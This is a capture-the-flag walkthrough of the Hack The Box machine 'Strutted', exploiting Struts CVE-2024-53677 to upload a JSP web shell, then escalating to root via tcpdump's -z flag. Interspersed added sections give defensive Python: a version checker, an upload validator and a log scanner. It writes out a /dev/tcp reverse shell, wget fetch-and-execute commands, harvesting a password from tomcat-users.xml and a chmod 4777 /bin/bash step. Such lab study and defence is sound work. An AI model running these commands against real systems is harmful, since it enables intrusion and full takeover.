# Strutted (HTB)

## Intro

Hello my lovely fellows. Today is a new day and a new machine, so let's jump into it.

## Enumeration

### Port scanning.

```
PORT   STATE SERVICE REASON  VERSION
22/tcp open  ssh     syn-ack OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 3e:ea:45:4b:c5:d1:6d:6f:e2:d4:d1:3b:0a:3d:a9:4f (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBJ+m7rYl1vRtnm789pH3IRhxI4CNCANVj+N5kovboNzcw9vHsBwvPX3KYA3cxGbKiA0VqbKRpOHnpsMuHEXEVJc=
|   256 64:cc:75:de:4a:e6:a5:b4:73:eb:3f:1b:cf:b4:e3:94 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIOtuEdoYxTohG80Bo6YCqSzUY9+qbnAFnhsk4yAZNqhM
80/tcp open  http    syn-ack nginx 1.18.0 (Ubuntu)
| http-methods: 
|_  Supported Methods: GET HEAD POST
|_http-title: Did not follow redirect to http://strutted.htb/
|_http-server-header: nginx/1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

Classic 22/80 machine. Let's check what the website has for us.

### Website enumeration.

Once we open the website we are going to see this upload functionality.

<figure><img src="https://616326001-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fi149KGmTZ4nvE4TuOMXm%2Fuploads%2F24vjqcwX3A5RJSDwyePz%2Fimage.png?alt=media&#x26;token=8f4d69bd-10cc-422c-bdc9-4a0236585192" alt=""><figcaption></figcaption></figure>

There is also a way to download the application. Let's download it and see what we have there before we go and test this.

<figure><img src="https://616326001-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fi149KGmTZ4nvE4TuOMXm%2Fuploads%2FtQt2rRMQsE1AxCPIKHlq%2Fimage.png?alt=media&#x26;token=ce63b009-c28f-4dde-bb99-39142d9f3bfc" alt=""><figcaption></figcaption></figure>

First thing we see is a tomcat user. I did some directory brute-force as well as subdomain enumeration but nothing was there.

### CVE-2024-53677

After looking in the source code a bit I came across this version of `Struts`, which is used in the application backend. Looking around the internet for this version,

```xml
<properties>
    <project.build.sourceEncoding>UTF-8</project.build.sourceEncoding>
    <maven.compiler.source>17</maven.compiler.source>
    <maven.compiler.target>17</maven.compiler.target>
    <struts2.version>6.3.0.1</struts2.version>
    <jetty-plugin.version>9.4.46.v20220331</jetty-plugin.version>
    <maven.javadoc.skip>true</maven.javadoc.skip>
    <jackson.version>2.14.1</jackson.version>
    <jackson-data-bind.version>2.14.1</jackson-data-bind.version>
</properties>
```

we are going to find this.

{% embed url="https://nvd.nist.gov/vuln/detail/CVE-2024-53677" %}

It has a known CVE, which is basically a flaw in the file upload mechanism that allows an attacker path traversal and, in some cases, a malicious file upload.
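As an added check (not part of the original writeup or of the Strutted app): a small Python script that pulls `struts2.version` out of a `pom.xml` like the one above and reports whether it falls inside the range the NVD entry lists as affected, every release from 2.0.0 up to but not including 6.4.0. The embedded pom fragment is constructed from the snippet above.

```python
import re
import xml.etree.ElementTree as ET

# Affected range for CVE-2024-53677 as listed by NVD: 2.0.0 <= version < 6.4.0.
AFFECTED_FROM = (2, 0, 0)
FIXED_IN = (6, 4, 0)

# pom.xml fragment constructed from the downloaded app's properties block,
# wrapped in a <project> root so it parses as a document.
SAMPLE_POM = """<project>
    <properties>
        <project.build.sourceEncoding>UTF-8</project.build.sourceEncoding>
        <maven.compiler.source>17</maven.compiler.source>
        <struts2.version>6.3.0.1</struts2.version>
        <jackson.version>2.14.1</jackson.version>
    </properties>
</project>"""


def parse_version(text):
    """Turn '6.3.0.1' into a comparable tuple of ints, ignoring any suffix."""
    parts = re.findall(r"\d+", text)
    if not parts:
        raise ValueError(f"unparseable version: {text!r}")
    return tuple(int(p) for p in parts)


def struts_version_from_pom(pom_xml):
    """Return the struts2.version property text, or None if absent."""
    root = ET.fromstring(pom_xml)
    for elem in root.iter():
        # Real poms carry a default namespace; strip it before comparing tags.
        if elem.tag.split("}", 1)[-1] == "struts2.version" and elem.text:
            return elem.text.strip()
    return None


def is_vulnerable(version):
    """True when the version sits inside the affected range."""
    return AFFECTED_FROM <= parse_version(version) < FIXED_IN


def check_pom(pom_xml):
    """Return (version, vulnerable); (None, False) when no Struts is declared."""
    version = struts_version_from_pom(pom_xml)
    if version is None:
        return None, False
    return version, is_vulnerable(version)


if __name__ == "__main__":
    version, vulnerable = check_pom(SAMPLE_POM)
    print(f"struts2.version={version} vulnerable={vulnerable}")
```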

## Shell as tomcat

So basically, through an implementation error in `FileUploadInterceptor`, the vulnerability allows us to upload a file and traverse the filesystem to choose where that file will live on disk. This is how we can exploit it:

1. First we need to capture an upload request via `burp suite` or whatever proxy you are using.
2. Then we need to trick it into thinking the uploaded file is some sort of image (`gif`, `png`, `jpg`, etc.).
3. After that we are going to abuse the `top.UploadFileName` parameter, which allows us to place the uploaded file wherever we want on the disk.
4. We use the payload ....

Here is the solution.

I used this payload:

{% embed url="https://raw.githubusercontent.com/TAM-K592/CVE-2024-53677-S2-067/refs/heads/ALOK/shell.jsp" %}

<figure><img src="https://616326001-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fi149KGmTZ4nvE4TuOMXm%2Fuploads%2FqdvFiEMaDJQDlQcYyaPK%2Fimage.png?alt=media&#x26;token=a78f9809-f3b0-46d9-b411-65e6c462d8b8" alt=""><figcaption></figcaption></figure>

Here we are tricking the server into thinking this is a `gif`. Also notice that we changed the case of the `upload` name.

<figure><img src="https://616326001-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fi149KGmTZ4nvE4TuOMXm%2Fuploads%2FZbawRJ6tEnerKgEGayOe%2Fimage.png?alt=media&#x26;token=465edad0-ada8-461b-a2b3-e723fc95b935" alt=""><figcaption></figcaption></figure>

Here we choose where we put the file. Two steps back to place it into the root directory so it is easily accessible. And simply using this `curl` command we can execute shell commands on the server:

```bash
curl 'http://strutted.htb/shell.jsp?action=cmd&cmd=id'
```
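Added example, not code from the original post or from the application: the server-side checks that would have stopped both tricks above, written in Python. `UPLOAD_ROOT` is an assumed directory; the validator confines the destination path (defeating the traversal via `top.UploadFileName`), enforces an image extension allowlist, requires the magic bytes to match that extension, and refuses image data that carries JSP markers such as the `<%` inside a `GIF87a`-prefixed web shell.

```python
import posixpath

# Assumed upload directory for this example (not the real app's path).
UPLOAD_ROOT = "/var/www/uploads"
# Magic bytes for the image types the form is meant to accept.
IMAGE_MAGIC = {b"GIF87a": "gif", b"GIF89a": "gif",
               b"\x89PNG\r\n\x1a\n": "png", b"\xff\xd8\xff": "jpg"}
ALLOWED_EXT = {"gif", "png", "jpg"}
# Server-side code markers that have no business inside an image
# (heuristic; a real deployment should also re-encode the image).
CODE_MARKERS = (b"<%", b"<jsp:", b"<?php")


def confine(filename, root=UPLOAD_ROOT):
    """Resolve filename under root after collapsing '..'; raise if it escapes."""
    dest = posixpath.normpath(posixpath.join(root, filename.replace("\\", "/")))
    if not dest.startswith(root.rstrip("/") + "/"):
        raise ValueError(f"{filename!r} escapes {root}")
    return dest


def sniff_type(data):
    """Guess the image type from leading magic bytes, or None."""
    for magic, kind in IMAGE_MAGIC.items():
        if data.startswith(magic):
            return kind
    return None


def validate_upload(filename, data):
    """Return (ok, reason, dest); dest is the confined path on success."""
    try:
        dest = confine(filename)
    except ValueError as exc:
        return False, str(exc), None
    if posixpath.dirname(dest) != UPLOAD_ROOT:
        return False, "subdirectories not allowed", None
    name = posixpath.basename(dest)
    ext = name.rsplit(".", 1)[-1].lower() if "." in name else ""
    ext = "jpg" if ext == "jpeg" else ext
    if ext not in ALLOWED_EXT:
        return False, f"extension {ext!r} not allowed", None
    kind = sniff_type(data)
    if kind != ext:
        return False, f"content sniffs as {kind}, not {ext}", None
    if any(marker in data for marker in CODE_MARKERS):
        return False, "script markers inside image data", None
    return True, "ok", dest
```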

From here you can do whatever you want to get a shell; as for me, I did it this way:

1. Open a python server and host a reverse shell.
2. Use `wget` on the target machine to pull it onto the server.
3. Change its permissions.
4. Execute it.

This is the payload I hosted.

```bash
sh -i >& /dev/tcp/10.10.16.111/9001 0>&1
```

For the python server:

```bash
python3 -m http.server <PORT>
```

This is the `wget` command, and the other commands:

```bash
Documents/hackTheBox/Strutted via  v3.13.7
❯ curl -G 'http://strutted.htb/shell.jsp?action=cmd' --data-urlencode "cmd=wget http://10.10.16.111:9090/shell -O /tmp/shell"


GIF87a



Documents/hackTheBox/Strutted via  v3.13.7
❯ curl -G 'http://strutted.htb/shell.jsp?action=cmd' --data-urlencode "cmd=ls /tmp"


GIF87a


hsperfdata_tomcat
shell
sqlite-3.47.1.0-7dc50d4f-631b-491f-8888-643f936c6614-libsqlitejdbc.so
sqlite-3.47.1.0-7dc50d4f-631b-491f-8888-643f936c6614-libsqlitejdbc.so.lck

Documents/hackTheBox/Strutted via  v3.13.7
❯ curl -G 'http://strutted.htb/shell.jsp?action=cmd' --data-urlencode "cmd=chmod +x /tmp/shell"


GIF87a


Documents/hackTheBox/Strutted via  v3.13.7
❯ curl -G 'http://strutted.htb/shell.jsp?action=cmd' --data-urlencode "cmd=bash /tmp/shell"


<html>
<head><title>504 Gateway Time-out</title></head>
<body>
<center><h1>504 Gateway Time-out</h1></center>
<hr><center>nginx/1.18.0 (Ubuntu)</center>
</body>
</html>

```

And here is our shell.

<figure><img src="https://616326001-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fi149KGmTZ4nvE4TuOMXm%2Fuploads%2FCMzJbK7Es7zgkVUCtqUV%2Fimage.png?alt=media&#x26;token=70ef23a7-4840-4e49-8504-b55417686bb0" alt=""><figcaption></figcaption></figure>
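Added detection example (not from the original writeup): a Python scanner over nginx access-log lines modelled on the `curl` calls above, flagging direct `.jsp` requests, command-style query parameters, shell tokens in the decoded command, and the 504 that shows up when the command blocks. The log lines and the `/upload.action` endpoint are constructed for this example.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed nginx access-log lines modelled on the curl calls above;
# /upload.action is a placeholder for the app's real upload endpoint.
SAMPLE_LOG = """\
10.10.16.111 - - [10/Jan/2025:14:02:11 +0000] "GET /shell.jsp?action=cmd&cmd=id HTTP/1.1" 200 12 "-" "curl/8.5.0"
10.10.16.111 - - [10/Jan/2025:14:03:40 +0000] "GET /shell.jsp?action=cmd&cmd=wget%20http%3A%2F%2F10.10.16.111%3A9090%2Fshell%20-O%20%2Ftmp%2Fshell HTTP/1.1" 200 8 "-" "curl/8.5.0"
10.10.16.111 - - [10/Jan/2025:14:05:02 +0000] "GET /shell.jsp?action=cmd&cmd=bash%20%2Ftmp%2Fshell HTTP/1.1" 504 160 "-" "curl/8.5.0"
198.51.100.7 - - [10/Jan/2025:14:06:00 +0000] "POST /upload.action HTTP/1.1" 302 0 "http://strutted.htb/" "Mozilla/5.0"
"""
LOG_RE = re.compile(r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) '
                    r'(?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)')
COMMAND_PARAMS = ("cmd", "command", "exec")          # typical web-shell knobs
SHELL_TOKENS = ("/tmp/", "/dev/tcp/", "wget ", "curl ", "chmod ", "bash ")


def parse_line(line):
    """Split one combined-format line into fields, or None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def flag_request(entry):
    """Return the reasons this request looks like web-shell traffic ([] if none)."""
    reasons = []
    parts = urlsplit(entry["target"])
    query = {k.lower(): v[0] for k, v in parse_qs(parts.query).items()}
    if parts.path.lower().endswith(".jsp"):
        # Assumption: this Struts app serves everything through actions, so a
        # directly requested .jsp is not something a legitimate user hits.
        reasons.append(f"direct .jsp request: {parts.path}")
    for name in COMMAND_PARAMS:
        if name in query:
            reasons.append(f"command parameter {name}={query[name]!r}")
            if any(tok in query[name] for tok in SHELL_TOKENS):
                reasons.append("shell tokens in command")
    if reasons and entry["status"] == "504":
        # The upstream worker never answered: consistent with a command that
        # blocked, such as a reverse shell holding the request open.
        reasons.append("gateway timeout after command")
    return reasons


def scan(lines):
    """Return (ip, target, reasons) for every line that raises a flag."""
    hits = []
    for entry in filter(None, map(parse_line, lines)):
        reasons = flag_request(entry)
        if reasons:
            hits.append((entry["ip"], entry["target"], reasons))
    return hits
```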

## Shell as james.

From there we just go into the `conf` directory, where we are going to find `tomcat-users.xml`, which includes a password.

<figure><img src="https://616326001-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fi149KGmTZ4nvE4TuOMXm%2Fuploads%2FjojMWFqnNwqYhwT2V4pF%2Fimage.png?alt=media&#x26;token=710865b6-e302-4c1c-92ab-f7003a8b30e7" alt=""><figcaption></figcaption></figure>

This is what we are looking for.

### Funny thing.

For some odd reason, when you try to `su` from the web shell into the user `james` it does not work, so I did not bother to check from ssh first because I thought it was wrong in the beginning; when I lost hope I tried there and it just worked .... <:)

Anyway. And if you ask how I found the user `james`, just check the `/etc/passwd` file.

## Shell as Root.

The process to get a shell as root was surprisingly easy; I really did not expect it to be this way, so I am not going to spend much time on it.

Use `sudo -l` to find what extra permissions you have.

<figure><img src="https://616326001-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fi149KGmTZ4nvE4TuOMXm%2Fuploads%2FhbKWe6iVve5gC9Wyf6Xs%2Fimage.png?alt=media&#x26;token=a9e55c7b-6aff-4a2d-aea1-9924324c8b57" alt=""><figcaption></figcaption></figure>

Using the classic website `gtfobins` we can find a way to get root.

{% embed url="https://gtfobins.github.io/gtfobins/tcpdump/" %}

Simply put, we are abusing the `-z` flag, which will execute a script after it finishes the logging process.

As you may expect, now just create a script that does, for example, change the permissions of `/bin/bash` to add the `sbit` to it, and execute it to become root.

{% hint style="success" %}
If you are wondering what `sbit` is, it is just an extra bit in the permissions that states that whoever executes this file will get the same permissions as the file owner. So guess what: if /bin/bash is owned by root and it has the `sbit`, then it will be executed as root and we will get a shell as root.
{% endhint %}

This is the exploit I used.

```bash
#!/bin/bash
chmod 4777 /bin/bash
```

And just simply run this command:

```bash
sudo tcpdump -ln -i lo -w /dev/null -W 1 -G 1 -z <PATH> -Z root
```

Replace `<PATH>` with the path to your exploit script.

And in my case I just checked `/bin/bash` and I saw this.

<figure><img src="https://616326001-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fi149KGmTZ4nvE4TuOMXm%2Fuploads%2FZcwgjD4JA0613DTo7DgH%2Fimage.png?alt=media&#x26;token=0e6d88d8-d6d5-4445-ad84-aa32a7b185dc" alt=""><figcaption></figcaption></figure>

But be careful: if you just execute it like that, newer Linux machines will drop the privileges, so you need to use the `-p` flag to avoid that.

<figure><img src="https://616326001-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fi149KGmTZ4nvE4TuOMXm%2Fuploads%2FJIbi9R2iCvLuQGHCUPF7%2Fimage.png?alt=media&#x26;token=436522f4-a689-4406-bb20-69d2b88aae9a" alt=""><figcaption></figcaption></figure>

## Closing.

And there you have it, a quick and easy machine. The initial access was interesting; I will be writing an exploit for it soon as more of a practice, but for now enjoy the rest of your day... :thumbsup:
